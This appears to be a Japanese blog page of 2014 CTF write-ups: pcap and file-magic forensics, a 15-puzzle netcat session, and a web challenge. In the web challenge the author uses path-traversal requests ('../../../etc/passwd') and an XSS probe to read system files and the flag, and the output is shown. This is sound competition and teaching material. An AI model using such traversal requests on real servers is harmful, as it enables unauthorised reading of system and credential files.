2014年5月11日日曜日

ASIS CTF writeup /forensic 150



ファイルをダウンロードするとxzで圧縮されていたので解凍
中にはpcapファイルが入っていた

とりあえずバイナリエディタで中身を見るとpcapの中にpcapファイルが入っていた


 これを抜き出してWiresharkで開くと

The capture file appears to be damaged or corrupt.
(pcap: File has 356738353-byte packet, bigger than maximum of 65535)


うまく開かなかったので↓のサイトで修復してもらった
http://f00l.de/hacking/pcapfix.php

修復後のファイル

開けるようになったがバイナリエディタのほうが見やすかったのでバイナリエディタで見る

%FAKE-HEADER 

%%Creator: ASIS-CTF-QUALS 100 (QUALS2014)

%%LanguageLevel: 2

%%CreationDate: D:20140506141008+04'30'

%%For: (username)

%%Title: (geany job #8)

%RBINumCopies: 1

%%Pages: (atend)

%%BoundingBox: (atend)

%%EndComments

%%BeginProlog

currentfile /ASCII85Decode filter /LZWDecode filter cvx exec



こんなものがあったのでWiresharkのTCP Follow Streamで抜き出してRawで保存
何かPDFっぽい何かがあったのが何かわからなかったのでいろいろとぐぐる

currentfile /ASCII85Decode filter /LZWDecode filter cvx exec
これで検索すると

https://www.assembla.com/code/wysiwyg/subversion/nodes/1/image%20files/aperture.eps
こんなサイトが、epsファイルらしい?

PostScriptによって記述されたベクタ形式の画像データ

ということで %FAKE-HEADERを%!PS-Adobe-3.0 EPSF-3.0これに変えると


flag:ASIS_54ca36b2e3e49fc30e566c1de0589f38



2014年5月5日月曜日

tkbctf3 writeup/Forensics 350/Web 250/Misc 250

Is the order a FAT?

Forensics 350

Find the flag.
Hint!: Use the metadata, Alice!

zipを解凍するとunknown.imgというイメージが出てくる。


内容はFAT12ぽいもの

ビットイメージを見てると画像か?圧縮ファイルか?見たいな塊があった

37 37 BC AF 27 1C おお7zipがある抜き出して解凍してみよう→だめ。


よく見たら37 37 BC AF 27 1C 2バイト目が37に変わっているみたいで

37 7A BC AF 27 1C 7Aに直してあげたら解凍できた。

参考に
https://www.itwebsupport.com/blog/reverse-engineering-hexadecimal-magic-numbers


中にoKNeJ.gifという画像がありflagが書いてあった





Misc 250

15-puzzleThe four lines make one set of input.Zero denotes the missing tile.If the input puzzle is solvable then send the count of the shortest steps to solve the puzzle (i.e. if it's possible to solve the puzzle in 4 steps, send "4\n\n" to the socket. \n denotes a line break.)If the puzzle is not solvable then send "NO\n\n". 
IP: 203.178.132.117, Port:3939

4*4のパズルで最短の手数を答える問題。解けない場合はNOを返す

最初プログラムを書いてチャレンジしていたのですが、問題が出て答えを送るまでの時間がとても長かったので手動でやりました。

http://www.ic-net.or.jp/home/takaken/e/15pz/

このツールを使って問題が表示されたら 並び替えて実行 並び替えて実行。

# nc 203.178.132.117 3939

Welcome. We are the fafrotskies.

Your answers must be terminated by an empty line, don't forget!



===== 15-Puzzle =====

Solve 15-Puzzle!

The four lines make one set of input.

Zero denotes the missing tile.

If the input puzzle is solvable then print the number of the shortest steps to solve the puzzle.

If the puzzle is not solvable then print the line "NO".



Stage #1

Enjoy!

#1

1 2 3 4

5 6 7 8

13 9 15 11

0 10 14 12

7



Stage 1 cleared.

Stage #2

The 2nd stage!

#1

1 2 6 3

5 10 12 4

9 7 8 15

13 0 14 11

16



#2

1 6 2 3

9 7 12 4

10 14 5 8

13 0 11 15

16



Stage 2 cleared.

Stage #3

The 3rd stage!

#1

1 2 3 4

0 6 8 11

5 10 7 12

9 13 14 15

11



#2

1 2 3 4

5 6 11 7

9 10 8 0

13 14 15 12

5



#3

1 3 12 4

6 2 0 7

5 10 11 8

9 13 14 15

15



Stage 3 cleared.

Stage #4

The 4th stage!

#1

6 2 1 3

5 10 14 4

9 12 0 8

13 11 7 15

28



#2

1 2 7 3

5 6 8 12

13 4 11 15

14 9 10 0

26



#3

5 1 6 3

8 0 2 4

10 11 7 12

9 13 14 15

18



#4

1 2 4 7

6 13 3 8

5 15 0 11

10 9 14 12

20



Stage 4 cleared.

Stage #5

The LAST stage!

#1

2 5 3 4

6 7 10 8

13 1 9 12

0 14 11 15

17



#2

1 2 4 8

5 7 3 11

10 6 9 0

14 13 15 12

21



#3

1 3 2 4

0 9 10 8

7 6 14 11

5 13 15 12

27



#4

1 6 2 7

9 5 4 11

10 0 8 15

13 14 12 3

23



#5

1 11 2 4

6 3 0 15

5 9 14 7

13 10 12 8

21



Complete! Flag is FLAG{N0_R4M3N_N0_L1F3!!}



Web250

miocatThe Development Support System -- miocat-> http://miocat.tkbctf.info

アクセスすると入力フォームと送信ボタンがあった。

送信すると
targetとlocaleをGETで渡している
http://miocat.tkbctf.info/request?target=&locale=en-US

適当に入力していたらエラーがでた。
入力値:http:/""<script>alert(1)</script>
Could not find a part of the path "/home/miocat/http:/""<script>alert(1)</script>".
入力した値が/home/miocat/の下に入るみたいだったので
後は
http://miocat.tkbctf.info/request?target=http://../../../etc/passwd&locale=en-US
入力値:http://../../../etc/passwd 
出力:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:105::/home/syslog:/bin/false
miocat:x:1001:1001:Miocat,,,Read /home/miocat/flag:/home/miocat:/bin/bash
chris:x:1000:1000::/home/chris:/bin/bash

適当に
http://miocat.tkbctf.info/request?target=http://../../../home/miocat/flag&locale=en-US
入力値:http://../../../home/miocat/flag   
出力:
flag: ElizabethDoesntSayLazy

適当にやってたらflagが表示されました。
これ直接flagってうっても出てたのかな?